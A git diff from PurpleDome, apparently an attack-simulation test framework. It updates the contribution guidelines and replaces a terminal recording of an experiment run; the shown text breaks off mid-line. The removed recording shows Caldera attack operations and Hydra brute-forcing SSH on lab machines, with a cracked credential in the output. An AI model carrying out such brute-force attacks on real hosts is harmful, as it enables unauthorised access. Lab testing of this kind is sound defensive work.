diff --git a/CONTRIBUTING.txt b/CONTRIBUTING.txt
index f2d8d53..6c7d48d 100644
--- a/CONTRIBUTING.txt
+++ b/CONTRIBUTING.txt
@@ -1,11 +1,18 @@
-We are looking forward to your contribution. To do so:
+We are looking forward to your contribution.
+You can find the project at https://github.com/avast/PurpleDome
+
+To simplify the process and enable others to contribute, we are using automated features from Github. For them to work properly, follow these steps:
+
+* Create an issue in our project to discuss your idea. This prevents duplicate implementations
+* Fork this project
 * Develop in an own branch for each feature
 * Test it using 'make test' which executes tox
-* If there are no bugs, create a PR to the master branch
+* After that you can push your branch to your fork
+* Create a pull request in the web ui. Please add as much information as possible
+
+Now automated scripts will verify the code and notify us.
-If you have bigger changes please also execute experiment_control.py and verify the basic experiment still works.
+Maybe we will give you some feedback. But the scripts should already have handled most of the issues.
-Server side tests:
-At the moment we do not test on the server. For the proper tests we would need an isolated test environment (AWS, Azure, ...). As it will have to run attacks. We are not there yet.
-=> Please test your changes
+If you have bigger changes please also execute experiment_control.py and verify the basic experiment still works before pushing.
diff --git a/doc/source/asciinema/experiment_control.cast b/doc/source/asciinema/experiment_control.cast
index f61b314..c507fbc 100644
--- a/doc/source/asciinema/experiment_control.cast
+++ b/doc/source/asciinema/experiment_control.cast
@@ -1,167 +1,351 @@ -{"version": 2, "width": 203, "height": 24, "timestamp": 1612795107, "env": {"SHELL": "/bin/bash", "TERM": "xterm-256color"}} -[0.02345, "o", "\u001b]0;thorsten@big: /home/PurpleDome\u0007\u001b[01;32mthorsten@big\u001b[00m:\u001b[01;34m/home/PurpleDome\u001b[00m$ "] -[5.660723, "o", "python3 experiment_control.py run"] -[7.06582, "o", "\r\n"] -[44.774933, "o", "\u001b[94mInstalling Caldera server \u001b[0m\r\n"] -[46.671437, "o", "Connecting to vagrant@127.0.0.1:2222\r\n"] -[46.674896, "o", "\r\n\u001b[92mCaldera server installed \u001b[0m\r\n"] -[46.74413, "o", "fatal: destination path 'caldera' already exists and is not an empty directory.\r\n"] -[47.578068, "o", "Defaulting to user installation because normal site-packages is not writeable\r\n"] -[47.684336, "o", "Requirement already satisfied: aiohttp-jinja2==1.2.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 1)) (1.2.0)\r\n"] -[47.684553, "o", "Requirement already satisfied: aiohttp==3.6.2 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 2)) (3.6.2)\r\n"] -[47.685026, "o", "Requirement already satisfied: aiohttp_session==2.9.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 3)) (2.9.0)\r\n"] -[47.685451, "o", "Requirement already satisfied: aiohttp-security==0.4.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 4)) (0.4.0)\r\n"] -[47.685891, "o", "Requirement already satisfied: jinja2==2.10.3 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 5)) (2.10.3)\r\n"] -[47.686378, "o", "Requirement already satisfied: pyyaml>=5.1 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 6)) (5.3.1)\r\n"] -[47.686752, "o", "Requirement already satisfied: cryptography==2.8 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 7)) (2.8)\r\n"] -[47.687137, "o", "Requirement already satisfied: 
websockets==8.1 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 8)) (8.1)\r\n"] -[47.687526, "o", "Requirement already satisfied: Sphinx==3.0.4 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 9)) (3.0.4)\r\n"] -[47.688051, "o", "Requirement already satisfied: sphinx_rtd_theme==0.4.3 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 10)) (0.4.3)\r\n"] -[47.688487, "o", "Requirement already satisfied: recommonmark==0.6.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 11)) (0.6.0)\r\n"] -[47.688879, "o", "Requirement already satisfied: marshmallow==3.5.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 12)) (3.5.1)\r\n"] -[47.68924, "o", "Requirement already satisfied: dirhash==0.1.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 13)) (0.1.1)\r\n"] -[47.689738, "o", "Requirement already satisfied: docker==4.2.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 14)) (4.2.0)\r\n"] -[47.690142, "o", "Requirement already satisfied: donut-shellcode==0.9.2 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 15)) (0.9.2)\r\n"] -[47.690584, "o", "Requirement already satisfied: marshmallow-enum==1.5.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 16)) (1.5.1)\r\n"] -[47.690978, "o", "Requirement already satisfied: ldap3==2.8.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 17)) (2.8.1)\r\n"] -[47.691419, "o", "Requirement already satisfied: lxml~=4.5.2 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 18)) (4.5.2)\r\n"] -[47.691924, "o", "Requirement already satisfied: reportlab==3.5.49 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 19)) (3.5.49)\r\n"] -[47.692325, "o", 
"Requirement already satisfied: svglib==1.0.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 20)) (1.0.1)\r\n"] -[47.722896, "o", "Requirement already satisfied: cffi!=1.11.3,>=1.8 in /usr/lib/python3/dist-packages (from cryptography==2.8->-r requirements.txt (line 7)) (1.14.3)\r\n"] -[47.723041, "o", "Requirement already satisfied: six>=1.4.1 in /usr/lib/python3/dist-packages (from cryptography==2.8->-r requirements.txt (line 7)) (1.15.0)\r\n"] -[47.725655, "o", "Requirement already satisfied: pathspec>=0.5.9 in /home/vagrant/.local/lib/python3.8/site-packages (from dirhash==0.1.1->-r requirements.txt (line 13)) (0.8.1)\r\n"] -[47.734457, "o", "Requirement already satisfied: websocket-client>=0.32.0 in /usr/lib/python3/dist-packages (from docker==4.2.0->-r requirements.txt (line 14)) (0.57.0)\r\n"] -[47.734806, "o", "Requirement already satisfied: requests!=2.18.0,>=2.14.2 in /usr/lib/python3/dist-packages (from docker==4.2.0->-r requirements.txt (line 14)) (2.24.0)\r\n"] -[47.738412, "o", "Requirement already satisfied: MarkupSafe>=0.23 in /usr/lib/python3/dist-packages (from jinja2==2.10.3->-r requirements.txt (line 5)) (1.1.1)\r\n"] -[47.740542, "o", "Requirement already satisfied: pyasn1>=0.4.6 in /usr/lib/python3/dist-packages (from ldap3==2.8.1->-r requirements.txt (line 17)) (0.4.8)\r\n"] -[47.757208, "o", "Requirement already satisfied: docutils>=0.11 in /usr/lib/python3/dist-packages (from recommonmark==0.6.0->-r requirements.txt (line 11)) (0.16)\r\n"] -[47.757506, "o", "Requirement already satisfied: commonmark>=0.8.1 in /home/vagrant/.local/lib/python3.8/site-packages (from recommonmark==0.6.0->-r requirements.txt (line 11)) (0.9.1)\r\n"] -[47.759656, "o", "Requirement already satisfied: pillow>=4.0.0 in /usr/lib/python3/dist-packages (from reportlab==3.5.49->-r requirements.txt (line 19)) (8.0.1)\r\n"] -[47.774274, "o", "Requirement already satisfied: Pygments>=2.0 in /usr/lib/python3/dist-packages (from 
Sphinx==3.0.4->-r requirements.txt (line 9)) (2.3.1)\r\n"] -[47.774601, "o", "Requirement already satisfied: alabaster<0.8,>=0.7 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (0.7.8)\r\n"] -[47.775084, "o", "Requirement already satisfied: sphinxcontrib-qthelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.3)\r\n"] -[47.77542, "o", "Requirement already satisfied: setuptools in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (50.3.0)\r\n"] -[47.775722, "o", "Requirement already satisfied: sphinxcontrib-devhelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.2)\r\n"] -[47.77616, "o", "Requirement already satisfied: snowballstemmer>=1.1 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.0.0)\r\n"] -[47.776757, "o", "Requirement already satisfied: sphinxcontrib-applehelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.2)\r\n"] -[47.777259, "o", "Requirement already satisfied: sphinxcontrib-serializinghtml in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.1.4)\r\n"] -[47.777573, "o", "Requirement already satisfied: sphinxcontrib-jsmath in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.1)\r\n"] -[47.777865, "o", "Requirement already satisfied: imagesize in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.2.0)\r\n"] -[47.778304, "o", "Requirement already satisfied: babel>=1.3 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.8.0)\r\n"] -[47.778749, "o", "Requirement already satisfied: packaging in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (20.4)\r\n"] -[47.779242, 
"o", "Requirement already satisfied: sphinxcontrib-htmlhelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.3)\r\n"] -[47.785233, "o", "Requirement already satisfied: tinycss2>=0.6.0 in /home/vagrant/.local/lib/python3.8/site-packages (from svglib==1.0.1->-r requirements.txt (line 20)) (1.1.0)\r\n"] -[47.785653, "o", "Requirement already satisfied: cssselect2>=0.2.0 in /home/vagrant/.local/lib/python3.8/site-packages (from svglib==1.0.1->-r requirements.txt (line 20)) (0.4.1)\r\n"] -[47.804144, "o", "Requirement already satisfied: webencodings in /usr/lib/python3/dist-packages (from cssselect2>=0.2.0->svglib==1.0.1->-r requirements.txt (line 20)) (0.5.1)\r\n"] -[48.236742, "o", "WARNING: You are using pip version 20.3.3; however, version 21.0.1 is available.\r\nYou should consider upgrading via the '/usr/bin/python3 -m pip install --upgrade pip' command.\r\n"] -[48.287567, "o", "\u001b[94mStarting Caldera server \u001b[0m\r\nConnecting to vagrant@127.0.0.1:2222\r\n"] -[48.28936, "o", "\r\n"] -[58.373838, "o", "0 Trying to connect to http://192.168.178.83:8888 Caldera API\r\n"] -[58.450802, "o", "Caldera: All systems nominal\r\n\u001b[92mCaldera server started \u001b[0m\r\n\u001b[94mpreparing target target1 ....\u001b[0m\r\n"] -[58.450913, "o", "\u001b[94mInstalling Caldera service \u001b[0m\r\n"] -[108.496761, "o", "\u001b[92mMachine created: target1\u001b[0m\r\n"] -[108.49695, "o", "\u001b[92mInstalled Caldera service \u001b[0m\r\n"] -[110.577613, "o", "\u001b[92mTarget running: target1 \u001b[0m\r\n\u001b[94mpreparing target target2 ....\u001b[0m\r\n"] -[113.61404, "o", "\u001b[94mInstalling Caldera service \u001b[0m\r\n"] -[113.647142, "o", "\u001b[92mInstalled Caldera service \u001b[0m\r\n"] -[241.860699, "o", "\u001b[92mTarget running: target2 \u001b[0m\r\n\u001b[94mContacting caldera agents on all targets ....\u001b[0m\r\n"] -[241.864951, "o", "List agents: ['target2w']\r\nConnecting to caldera 
http://192.168.178.83:8888, running agents are: ['target2w']\r\nMissing agent: target1 ...\r\n"] -[241.864985, "o", "\r\nnohup /vagrant/target1/caldera_agent.sh start &\r\n \r\n\u001b[94mStarting Caldera client \u001b[0m\r\n"] -[243.37839, "o", "Connecting to vagrant@127.0.0.1:2200\r\n"] -[243.380729, "o", "\r\n"] -[243.970575, "o", "\u001b[92mCaldera client started \u001b[0m\r\n"] -[248.98351, "o", "List agents: ['target2w', 'target1']\r\n\u001b[92mCaldera agents reached\u001b[0m\r\n\u001b[94mRunning Caldera attacks\u001b[0m\r\nAttacking machine with PAW: target1\r\n"] -[249.07589, "o", "\u001b[92mExecuted attack operation\u001b[0m\r\n"] -[249.078827, "o", ".\r\n"] -[250.084198, "o", ".\r\n"] -[251.089392, "o", ".\r\n"] -[252.095383, "o", ".\r\n"] -[253.100916, "o", ".\r\n"] -[254.107019, "o", ".\r\n"] -[255.113229, "o", ".\r\n"] -[256.119078, "o", ".\r\n"] -[257.124811, "o", ".\r\n"] -[258.130561, "o", ".\r\n"] -[259.136545, "o", ".\r\n"] -[260.142284, "o", ".\r\n"] -[261.147564, "o", ".\r\n"] -[262.153097, "o", ".\r\n"] -[263.159054, "o", ".\r\n"] -[264.164656, "o", ".\r\n"] -[265.170309, "o", ".\r\n"] -[266.175776, "o", ".\r\n"] -[267.181497, "o", ".\r\n"] -[268.187033, "o", ".\r\n"] -[269.192857, "o", ".\r\n"] -[270.198772, "o", ".\r\n"] -[271.20458, "o", ".\r\n"] -[272.210351, "o", ".\r\n"] -[273.215974, "o", ".\r\n"] -[274.221582, "o", ".\r\n"] -[275.227259, "o", ".\r\n"] -[276.232114, "o", ".\r\n"] -[277.238006, "o", ".\r\n"] -[278.244737, "o", ".\r\n"] -[279.250372, "o", ".\r\n"] -[280.255877, "o", ".\r\n"] -[281.261142, "o", ".\r\n"] -[282.266827, "o", ".\r\n"] -[283.276212, "o", ".\r\n"] -[284.281898, "o", ".\r\n"] -[285.292303, "o", "Output: vagrant\r\n"] -[285.302496, "o", "\u001b[92mFinished Caldera attacks\u001b[0m\r\n\u001b[94mRunning Kali attacks\u001b[0m\r\n"] -[285.331901, "o", "\u001b[94mRunning Kali plugin hydra\u001b[0m\r\nConnecting to vagrant@127.0.0.1:2222\r\n"] -[285.334009, "o", "\r\n"] -[285.540974, "o", "Hydra v9.1 (c) 2020 by van 
Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\r\n\r\nHydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-02-08 09:43:11\r\n[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\r\n"] -[285.54132, "o", "[DATA] max 16 tasks per 1 server, overall 16 tasks, 35 login tries (l:5/p:7), ~3 tries per task\r\n[DATA] attacking ssh://192.168.178.78:22/\r\n"] -[287.670203, "o", "[22][ssh] host: 192.168.178.78 login: password password: passw0rd\r\n"] -[289.605076, "o", "1 of 1 target successfully completed, 1 valid password found\r\n[WARNING] Writing restore file because 1 final worker threads did not complete until end.\r\n"] -[289.605222, "o", "[ERROR] 1 target did not resolve or could not be connected\r\n[ERROR] 0 target did not complete\r\n"] -[289.605332, "o", "Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-02-08 09:43:15\r\n"] -[289.633459, "o", "\u001b[92mFinished Kali attacks\u001b[0m\r\n\u001b[94mRunning Caldera attacks\u001b[0m\r\nAttacking machine with PAW: target2w\r\n"] -[289.735264, "o", "\u001b[92mExecuted attack operation\u001b[0m\r\n"] -[289.737673, "o", ".\r\n"] -[290.743309, "o", ".\r\n"] -[291.749143, "o", ".\r\n"] -[292.75563, "o", ".\r\n"] -[293.761762, "o", ".\r\n"] -[294.767529, "o", ".\r\n"] -[295.773933, "o", ".\r\n"] -[296.779098, "o", ".\r\n"] -[297.785246, "o", ".\r\n"] -[298.79125, "o", ".\r\n"] -[299.796894, "o", ".\r\n"] -[300.803806, "o", ".\r\n"] -[301.809912, "o", ".\r\n"] -[302.81538, "o", ".\r\n"] -[303.821704, "o", ".\r\n"] -[304.827187, "o", ".\r\n"] -[305.832174, "o", ".\r\n"] -[306.837548, "o", ".\r\n"] -[307.843364, "o", ".\r\n"] -[308.849045, "o", ".\r\n"] -[309.854627, "o", ".\r\n"] -[310.859799, "o", ".\r\n"] -[311.865091, "o", ".\r\n"] -[312.871194, "o", ".\r\n"] -[313.877016, "o", ".\r\n"] 
-[314.883502, "o", ".\r\n"] -[315.889784, "o", ".\r\n"] -[316.895866, "o", ".\r\n"] -[317.900879, "o", ".\r\n"] -[318.905719, "o", ".\r\n"] -[319.915607, "o", "Output: target2w\\purpledome\r\r\n"] -[319.925076, "o", "\u001b[92mFinished Caldera attacks\u001b[0m\r\n\u001b[94mRunning Kali attacks\u001b[0m\r\n"] -[319.943831, "o", "\u001b[94mRunning Kali plugin hydra\u001b[0m\r\nConnecting to vagrant@127.0.0.1:2222\r\n"] -[319.945699, "o", "\r\n"] -[320.026581, "o", "Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\r\n\r\nHydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-02-08 09:43:46\r\n"] -[320.026727, "o", "[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\r\n"] -[320.026917, "o", "[DATA] max 16 tasks per 1 server, overall 16 tasks, 35 login tries (l:5/p:7), ~3 tries per task\r\n[DATA] attacking ssh://192.168.178.189:22/\r\n"] -[323.093246, "o", "1 of 1 target completed, 0 valid password found\r\n"] -[323.093366, "o", "Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-02-08 09:43:49\r\n"] -[323.107755, "o", "\u001b[92mFinished Kali attacks\u001b[0m\r\n\u001b[94mStopping machine: target1 \u001b[0m\r\n"] -[387.451531, "o", "\u001b[92mMachine stopped: target1\u001b[0m\r\n\u001b[94mStopping machine: target2 \u001b[0m\r\n"] -[390.6315, "o", "\u001b[92mMachine stopped: target2\u001b[0m\r\n\u001b[94mStopping machine: attacker \u001b[0m\r\n"] -[395.805543, "o", "\u001b[92mMachine stopped: attacker\u001b[0m\r\n"] -[395.826481, "o", "\u001b]0;thorsten@big: /home/PurpleDome\u0007\u001b[01;32mthorsten@big\u001b[00m:\u001b[01;34m/home/PurpleDome\u001b[00m$ "] -[398.414983, "o", "exit\r\n"] +{"version": 2, "width": 148, "height": 47, "timestamp": 1623220625, "idle_time_limit": 0.5, "env": {"SHELL": "/bin/bash", "TERM": 
"xterm-256color"}} +[0.016732, "o", "\u001b]0;thorsten@avast: /home/PurpleDome\u0007\u001b[01;32mthorsten@avast\u001b[00m:\u001b[01;34m/home/PurpleDome\u001b[00m$ "] +[1.249977, "o", "python3 ./experiment_control.py -v run"] +[1.8469, "o", "\r\n"] +[1.989824, "o", "\u001b[94mInstalling machinery: vagrant\u001b[0m\r\n"] +[1.98994, "o", "\u001b[92mInstalled machinery: vagrant\u001b[0m\r\n"] +[44.497129, "o", "\u001b[94mInstalling Caldera server \u001b[0m\r\n\u001b[92mCaldera server installed \u001b[0m\r\n"] +[46.148337, "o", "zsh:cd:1: no such file or directory: None\r\n"] +[46.152243, "o", "fatal: destination path 'caldera' already exists and is not an empty directory.\r\n"] +[46.60299, "o", "Defaulting to user installation because normal site-packages is not writeable\r\n"] +[46.65791, "o", "Requirement already satisfied: aiohttp-jinja2==1.2.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 1)) (1.2.0)\r\n"] +[46.658396, "o", "Requirement already satisfied: aiohttp==3.6.2 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 2)) (3.6.2)\r\n"] +[46.658948, "o", "Requirement already satisfied: aiohttp_session==2.9.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 3)) (2.9.0)\r\n"] +[46.659644, "o", "Requirement already satisfied: aiohttp-security==0.4.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 4)) (0.4.0)\r\n"] +[46.660103, "o", "Requirement already satisfied: jinja2==2.10.3 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 5)) (2.10.3)\r\n"] +[46.660601, "o", "Requirement already satisfied: pyyaml>=5.1 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 6)) (5.3.1)\r\n"] +[46.661215, "o", "Requirement already satisfied: cryptography==2.8 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 7)) (2.8)\r\n"] +[46.661805, "o", "Requirement already satisfied: 
websockets==8.1 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 8)) (8.1)\r\n"] +[46.662547, "o", "Requirement already satisfied: Sphinx==3.0.4 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 9)) (3.0.4)\r\n"] +[46.66313, "o", "Requirement already satisfied: sphinx_rtd_theme==0.4.3 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 10)) (0.4.3)\r\n"] +[46.663676, "o", "Requirement already satisfied: recommonmark==0.6.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 11)) (0.6.0)\r\n"] +[46.664321, "o", "Requirement already satisfied: marshmallow==3.5.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 12)) (3.5.1)\r\n"] +[46.664861, "o", "Requirement already satisfied: dirhash==0.1.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 13)) (0.1.1)\r\n"] +[46.665769, "o", "Requirement already satisfied: docker==4.2.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 14)) (4.2.0)\r\n"] +[46.666323, "o", "Requirement already satisfied: donut-shellcode==0.9.2 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 15)) (0.9.2)\r\n"] +[46.675298, "o", "Requirement already satisfied: marshmallow-enum==1.5.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 16)) (1.5.1)\r\n"] +[46.675664, "o", "Requirement already satisfied: ldap3==2.8.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 17)) (2.8.1)\r\n"] +[46.676383, "o", "Requirement already satisfied: lxml~=4.5.2 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 18)) (4.5.2)\r\n"] +[46.676888, "o", "Requirement already satisfied: reportlab==3.5.49 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 19)) (3.5.49)\r\n"] +[46.677518, "o", 
"Requirement already satisfied: svglib==1.0.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 20)) (1.0.1)\r\n"] +[46.694408, "o", "Requirement already satisfied: MarkupSafe>=0.23 in /usr/lib/python3/dist-packages (from jinja2==2.10.3->-r requirements.txt (line 5)) (1.1.1)\r\n"] +[46.705625, "o", "Requirement already satisfied: cffi!=1.11.3,>=1.8 in /usr/lib/python3/dist-packages (from cryptography==2.8->-r requirements.txt (line 7)) (1.14.3)\r\n"] +[46.706241, "o", "Requirement already satisfied: six>=1.4.1 in /usr/lib/python3/dist-packages (from cryptography==2.8->-r requirements.txt (line 7)) (1.15.0)\r\n"] +[46.719201, "o", "Requirement already satisfied: babel>=1.3 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.8.0)\r\n"] +[46.719573, "o", "Requirement already satisfied: imagesize in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.2.0)\r\n"] +[46.720224, "o", "Requirement already satisfied: requests>=2.5.0 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.24.0)\r\n"] +[46.720647, "o", "Requirement already satisfied: packaging in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (20.4)\r\n"] +[46.721477, "o", "Requirement already satisfied: sphinxcontrib-htmlhelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.0.0)\r\n"] +[46.722037, "o", "Requirement already satisfied: Pygments>=2.0 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.3.1)\r\n"] +[46.722637, "o", "Requirement already satisfied: sphinxcontrib-qthelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.3)\r\n"] +[46.723175, "o", "Requirement already satisfied: snowballstemmer>=1.1 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) 
(2.1.0)\r\n"] +[46.723793, "o", "Requirement already satisfied: alabaster<0.8,>=0.7 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (0.7.8)\r\n"] +[46.72433, "o", "Requirement already satisfied: setuptools in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (50.3.0)\r\n"] +[46.724817, "o", "Requirement already satisfied: sphinxcontrib-applehelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.2)\r\n"] +[46.725408, "o", "Requirement already satisfied: sphinxcontrib-jsmath in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.1)\r\n"] +[46.725894, "o", "Requirement already satisfied: sphinxcontrib-devhelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.2)\r\n"] +[46.726375, "o", "Requirement already satisfied: sphinxcontrib-serializinghtml in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.1.5)\r\n"] +[46.727076, "o", "Requirement already satisfied: docutils>=0.12 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (0.16)\r\n"] +[46.731192, "o", "Requirement already satisfied: commonmark>=0.8.1 in /home/vagrant/.local/lib/python3.8/site-packages (from recommonmark==0.6.0->-r requirements.txt (line 11)) (0.9.1)\r\n"] +[46.744698, "o", "Requirement already satisfied: pathspec>=0.5.9 in /home/vagrant/.local/lib/python3.8/site-packages (from dirhash==0.1.1->-r requirements.txt (line 13)) (0.8.1)\r\n"] +[46.753132, "o", "Requirement already satisfied: websocket-client>=0.32.0 in /usr/lib/python3/dist-packages (from docker==4.2.0->-r requirements.txt (line 14)) (0.57.0)\r\n"] +[46.75779, "o", "Requirement already satisfied: pyasn1>=0.4.6 in /usr/lib/python3/dist-packages (from ldap3==2.8.1->-r requirements.txt (line 17)) (0.4.8)\r\n"] +[46.75982, 
"o", "Requirement already satisfied: pillow>=4.0.0 in /usr/lib/python3/dist-packages (from reportlab==3.5.49->-r requirements.txt (line 19)) (8.0.1)\r\n"] +[46.763264, "o", "Requirement already satisfied: cssselect2>=0.2.0 in /home/vagrant/.local/lib/python3.8/site-packages (from svglib==1.0.1->-r requirements.txt (line 20)) (0.4.1)\r\n"] +[46.763892, "o", "Requirement already satisfied: tinycss2>=0.6.0 in /home/vagrant/.local/lib/python3.8/site-packages (from svglib==1.0.1->-r requirements.txt (line 20)) (1.1.0)\r\n"] +[46.779935, "o", "Requirement already satisfied: webencodings in /usr/lib/python3/dist-packages (from cssselect2>=0.2.0->svglib==1.0.1->-r requirements.txt (line 20)) (0.5.1)\r\n"] +[47.114079, "o", "Command exited with status 0.\r\n=== stdout ===\r\nDefaulting to user installation because normal site-packages is not writeable\r\nRequirement already satisfied: aiohttp-jinja2==1.2.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 1)) (1.2.0)\r\nRequirement already satisfied: aiohttp==3.6.2 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 2)) (3.6.2)\r\nRequirement already satisfied: aiohttp_session==2.9.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 3)) (2.9.0)\r\nRequirement already satisfied: aiohttp-security==0.4.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 4)) (0.4.0)\r\nRequirement already satisfied: jinja2==2.10.3 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 5)) (2.10.3)\r\nRequirement already satisfied: pyyaml>=5.1 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 6)) (5.3.1)\r\nRequirement already satisfied: cryptography==2.8 in /h"] +[47.114214, "o", "ome/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 7)) (2.8)\r\nRequirement already satisfied: websockets==8.1 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 8)) 
(8.1)\r\nRequirement already satisfied: Sphinx==3.0.4 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 9)) (3.0.4)\r\nRequirement already satisfied: sphinx_rtd_theme==0.4.3 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 10)) (0.4.3)\r\nRequirement already satisfied: recommonmark==0.6.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 11)) (0.6.0)\r\nRequirement already satisfied: marshmallow==3.5.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 12)) (3.5.1)\r\nRequirement already satisfied: dirhash==0.1.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 13)) (0.1.1)\r\nRequirement already satisfied: docker==4.2.0 in /home/vagrant/.local/lib/p"] +[47.114265, "o", "ython3.8/site-packages (from -r requirements.txt (line 14)) (4.2.0)\r\nRequirement already satisfied: donut-shellcode==0.9.2 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 15)) (0.9.2)\r\nRequirement already satisfied: marshmallow-enum==1.5.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 16)) (1.5.1)\r\nRequirement already satisfied: ldap3==2.8.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 17)) (2.8.1)\r\nRequirement already satisfied: 